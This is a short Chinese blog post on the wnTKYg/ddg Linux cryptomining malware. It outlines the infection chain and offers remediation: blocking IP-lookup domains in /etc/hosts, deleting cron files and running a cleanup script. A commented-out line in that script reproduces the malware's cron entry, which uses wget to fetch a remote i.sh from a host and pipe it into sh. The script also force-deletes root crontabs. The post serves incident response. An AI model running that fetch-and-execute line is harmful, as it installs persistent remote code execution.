近期 wnTKYg Linux 恶意软件简介

最新推荐文章于 2020-09-20 23:21:19 发布

i0dooo

最新推荐文章于 2020-09-20 23:21:19 发布

阅读量483

点赞数

文章标签：恶意软件 http服务器

本文链接：https://blog.csdn.net/iodoo/article/details/78628564

版权

源头 : /tmp/ddg.2020

1.下载配置数据库，用来攻击其他电脑；
2.从配置中获取http服务器，下载i.sh的脚本；
3.将脚本插入到系统的cron中，定时执行；
4.执行脚本，将挖矿程序下载到本地，开始挖矿；

根据以上流程，可以从各个点来切断传播；

1. 切断第一步，让其无法获取配置文件，程序会先获取自身所在电脑的公网IP，

当获取不到公网IP之后，就没有然后了。。。以下从几个域名中可获取公网IP:

ident.me
v4.ident.me
ipinfo.io
ipecho.net
ipv4.icanhazip.com
ifconfig.co

在linux上加入到 /etc/hosts

127.0.0.1 v4.ident.me

127.0.0.1 ipinfo.io
127.0.0.1 ipecho.net
127.0.0.1 ipv4.icanhazip.com
127.0.0.1 ifconfig.co

2.切断第三步，让其无法自动执行

删除该路径下面的所有文件 /var/spool/cron

3.切断第四步，删除所有恶意程序

删除 /tmp/ddg.2020 /tmp/wnTKYg

必须要立马修改密码, 清除脚本

#!/bin/sh
#ver 1.1
chmod -x /tmp/ddg.2020 /tmp/wnTKYg
killall ddg.2020 wnTKYg
echo "as" > /tmp/ddg.2020
echo "as" > /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill

rm -rf  /var/spool/cron/root

rm -rf  /var/spool/cron/crontabs/root

#echo "* * * * * wget -q -O- http://10.0.22.61:9443/i.sh | sh" >> /var/spool/cron/crontabs/root

killall ddg.2020 wnTKYg

rm -rf /tmp/ddg.2020
rm -rf /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill

=勿转载~~